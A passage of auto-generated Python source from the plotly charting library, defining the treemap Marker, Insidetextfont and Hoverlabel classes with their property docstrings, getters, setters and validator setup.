If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This
measure excludes the size of the padding, ticks
and labels.
thicknessmode
Determines whether this color bar's thickness
(i.e. the measure in the constant color
direction) is set in units of plot "fraction"
or in "pixels". Use `thickness` to set the
value.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format
And for dates see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format
We add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
A tuple of plotly.graph_objects.treemap.marker.
colorbar.Tickformatstop instances or dicts with
compatible properties
tickformatstopdefaults
When used in a template (as layout.template.dat
a.treemap.marker.colorbar.tickformatstopdefault
s), sets the default property values to use for
elements of
treemap.marker.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on plot.ly for
ticktext .
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for
tickvals .
tickwidth
Sets the tick width (in px).
title
plotly.graph_objects.treemap.marker.colorbar.Ti
tle instance or dict with compatible properties
titlefont
Deprecated: Please use
treemap.marker.colorbar.title.font instead.
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
titleside
Deprecated: Please use
treemap.marker.colorbar.title.side instead.
Determines the location of color bar's title
with respect to the color bar. Note that the
title's location used to be set by the now
deprecated `titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position
anchor. This anchor binds the `x` position to
the "left", "center" or "right" of the color
bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
Sets this color bar's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
plotly.graph_objs.treemap.marker.ColorBar
"""
return self["colorbar"]
@colorbar.setter
def colorbar(self, val):
self["colorbar"] = val
# colors
# ------
@property
def colors(self):
"""
Sets the color of each sector of this trace. If not specified,
the default trace color set is used to pick the sector colors.
The 'colors' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["colors"]
@colors.setter
def colors(self, val):
self["colors"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. Has an effect only if colorsis set to a
numerical array. The colorscale must be an array containing
arrays mapping a normalized value to an rgb, rgba, hex, hsl,
hsv, or named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`. To control the
bounds of the colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a palette
name string of the following list: Greys,YlGnBu,Greens,YlOrRd,B
luered,RdBu,Reds,Blues,Picnic,Rainbow,Portland,Jet,Hot,Blackbod
y,Earth,Electric,Viridis,Cividis.
The 'colorscale' property is a colorscale and may be
specified as:
- A list of colors that will be spaced evenly to create the colorscale.
Many predefined colorscale lists are included in the sequential, diverging,
and cyclical modules in the plotly.colors package.
- A list of 2-element lists where the first element is the
normalized color level value (starting at 0 and ending at 1),
and the second item is a valid color string.
(e.g. [[0, 'green'], [0.5, 'red'], [1.0, 'rgb(0, 0, 255)']])
- One of the following named colorscales:
['aggrnyl', 'agsunset', 'algae', 'amp', 'armyrose', 'balance',
'blackbody', 'bluered', 'blues', 'blugrn', 'bluyl', 'brbg',
'brwnyl', 'bugn', 'bupu', 'burg', 'burgyl', 'cividis', 'curl',
'darkmint', 'deep', 'delta', 'dense', 'earth', 'edge', 'electric',
'emrld', 'fall', 'geyser', 'gnbu', 'gray', 'greens', 'greys',
'haline', 'hot', 'hsv', 'ice', 'icefire', 'inferno', 'jet',
'magenta', 'magma', 'matter', 'mint', 'mrybm', 'mygbm', 'oranges',
'orrd', 'oryel', 'peach', 'phase', 'picnic', 'pinkyl', 'piyg',
'plasma', 'plotly3', 'portland', 'prgn', 'pubu', 'pubugn', 'puor',
'purd', 'purp', 'purples', 'purpor', 'rainbow', 'rdbu', 'rdgy',
'rdpu', 'rdylbu', 'rdylgn', 'redor', 'reds', 'solar', 'spectral',
'speed', 'sunset', 'sunsetdark', 'teal', 'tealgrn', 'tealrose',
'tempo', 'temps', 'thermal', 'tropic', 'turbid', 'twilight',
'viridis', 'ylgn', 'ylgnbu', 'ylorbr', 'ylorrd']
Returns
-------
str
"""
return self["colorscale"]
@colorscale.setter
def colorscale(self, val):
self["colorscale"] = val
# colorssrc
# ---------
@property
def colorssrc(self):
"""
Sets the source reference on plot.ly for colors .
The 'colorssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorssrc"]
@colorssrc.setter
def colorssrc(self, val):
self["colorssrc"] = val
# depthfade
# ---------
@property
def depthfade(self):
"""
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This option is
unavailable when a `colorscale` is present, defaults to false
when `marker.colors` is set, but otherwise defaults to true.
When set to "reversed", the fading direction is inverted, that
is the top elements within hierarchy are drawn with fully
saturated colors while the leaves are faded towards the
background color.
The 'depthfade' property is an enumeration that may be specified as:
- One of the following enumeration values:
[True, False, 'reversed']
Returns
-------
Any
"""
return self["depthfade"]
@depthfade.setter
def depthfade(self, val):
self["depthfade"] = val
# line
# ----
@property
def line(self):
"""
The 'line' property is an instance of Line
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.Line
- A dict of string/value properties that will be passed
to the Line constructor
Supported dict properties:
color
Sets the color of the line enclosing each
sector. Defaults to the `paper_bgcolor` value.
colorsrc
Sets the source reference on plot.ly for color
.
width
Sets the width (in px) of the line enclosing
each sector.
widthsrc
Sets the source reference on plot.ly for width
.
Returns
-------
plotly.graph_objs.treemap.marker.Line
"""
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
# pad
# ---
@property
def pad(self):
"""
The 'pad' property is an instance of Pad
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.Pad
- A dict of string/value properties that will be passed
to the Pad constructor
Supported dict properties:
b
Sets the padding form the bottom (in px).
l
Sets the padding form the left (in px).
r
Sets the padding form the right (in px).
t
Sets the padding form the top (in px).
Returns
-------
plotly.graph_objs.treemap.marker.Pad
"""
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
# reversescale
# ------------
@property
def reversescale(self):
"""
Reverses the color mapping if true. Has an effect only if
colorsis set to a numerical array. If true, `marker.cmin` will
correspond to the last color in the array and `marker.cmax`
will correspond to the first color.
The 'reversescale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["reversescale"]
@reversescale.setter
def reversescale(self, val):
self["reversescale"] = val
# showscale
# ---------
@property
def showscale(self):
"""
Determines whether or not a colorbar is displayed for this
trace. Has an effect only if colorsis set to a numerical array.
The 'showscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showscale"]
@showscale.setter
def showscale(self, val):
self["showscale"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax` Has an
effect only if colorsis set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colorsis set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colorsis set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colorsis set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colorsis set to a
numerical array.
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
coloraxis=None,
colorbar=None,
colors=None,
colorscale=None,
colorssrc=None,
depthfade=None,
line=None,
pad=None,
reversescale=None,
showscale=None,
**kwargs
):
"""
Construct a new Marker object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Marker
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax` Has an
effect only if colorsis set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colorsis set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colorsis set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colorsis set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colorsis set to a
numerical array.
Returns
-------
Marker
"""
super(Marker, self).__init__("marker")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Marker
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Marker"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import marker as v_marker
# Initialize validators
# ---------------------
self._validators["autocolorscale"] = v_marker.AutocolorscaleValidator()
self._validators["cauto"] = v_marker.CautoValidator()
self._validators["cmax"] = v_marker.CmaxValidator()
self._validators["cmid"] = v_marker.CmidValidator()
self._validators["cmin"] = v_marker.CminValidator()
self._validators["coloraxis"] = v_marker.ColoraxisValidator()
self._validators["colorbar"] = v_marker.ColorBarValidator()
self._validators["colors"] = v_marker.ColorsValidator()
self._validators["colorscale"] = v_marker.ColorscaleValidator()
self._validators["colorssrc"] = v_marker.ColorssrcValidator()
self._validators["depthfade"] = v_marker.DepthfadeValidator()
self._validators["line"] = v_marker.LineValidator()
self._validators["pad"] = v_marker.PadValidator()
self._validators["reversescale"] = v_marker.ReversescaleValidator()
self._validators["showscale"] = v_marker.ShowscaleValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("autocolorscale", None)
self["autocolorscale"] = autocolorscale if autocolorscale is not None else _v
_v = arg.pop("cauto", None)
self["cauto"] = cauto if cauto is not None else _v
_v = arg.pop("cmax", None)
self["cmax"] = cmax if cmax is not None else _v
_v = arg.pop("cmid", None)
self["cmid"] = cmid if cmid is not None else _v
_v = arg.pop("cmin", None)
self["cmin"] = cmin if cmin is not None else _v
_v = arg.pop("coloraxis", None)
self["coloraxis"] = coloraxis if coloraxis is not None else _v
_v = arg.pop("colorbar", None)
self["colorbar"] = colorbar if colorbar is not None else _v
_v = arg.pop("colors", None)
self["colors"] = colors if colors is not None else _v
_v = arg.pop("colorscale", None)
self["colorscale"] = colorscale if colorscale is not None else _v
_v = arg.pop("colorssrc", None)
self["colorssrc"] = colorssrc if colorssrc is not None else _v
_v = arg.pop("depthfade", None)
self["depthfade"] = depthfade if depthfade is not None else _v
_v = arg.pop("line", None)
self["line"] = line if line is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("reversescale", None)
self["reversescale"] = reversescale if reversescale is not None else _v
_v = arg.pop("showscale", None)
self["showscale"] = showscale if showscale is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Insidetextfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Insidetextfont object
Sets the font used for `textinfo` lying inside the sector.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Insidetextfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Insidetextfont
"""
super(Insidetextfont, self).__init__("insidetextfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Insidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Insidetextfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import insidetextfont as v_insidetextfont
# Initialize validators
# ---------------------
self._validators["color"] = v_insidetextfont.ColorValidator()
self._validators["colorsrc"] = v_insidetextfont.ColorsrcValidator()
self._validators["family"] = v_insidetextfont.FamilyValidator()
self._validators["familysrc"] = v_insidetextfont.FamilysrcValidator()
self._validators["size"] = v_insidetextfont.SizeValidator()
self._validators["sizesrc"] = v_insidetextfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
# align
# -----
@property
def align(self):
"""
Sets the horizontal alignment of the text content within hover
label box. Has an effect only if the hover label text spans
more two or more lines
The 'align' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'right', 'auto']
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
Any|numpy.ndarray
"""
return self["align"]
@align.setter
def align(self, val):
self["align"] = val
# alignsrc
# --------
@property
def alignsrc(self):
"""
Sets the source reference on plot.ly for align .
The 'alignsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["alignsrc"]
@alignsrc.setter
def alignsrc(self, val):
self["alignsrc"] = val
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the background color of the hover labels for this trace
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bgcolor"]
@bgcolor.setter
def bgcolor(self, val):
self["bgcolor"] = val
# bgcolorsrc
# ----------
@property
def bgcolorsrc(self):
"""
Sets the source reference on plot.ly for bgcolor .
The 'bgcolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bgcolorsrc"]
@bgcolorsrc.setter
def bgcolorsrc(self, val):
self["bgcolorsrc"] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the border color of the hover labels for this trace.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
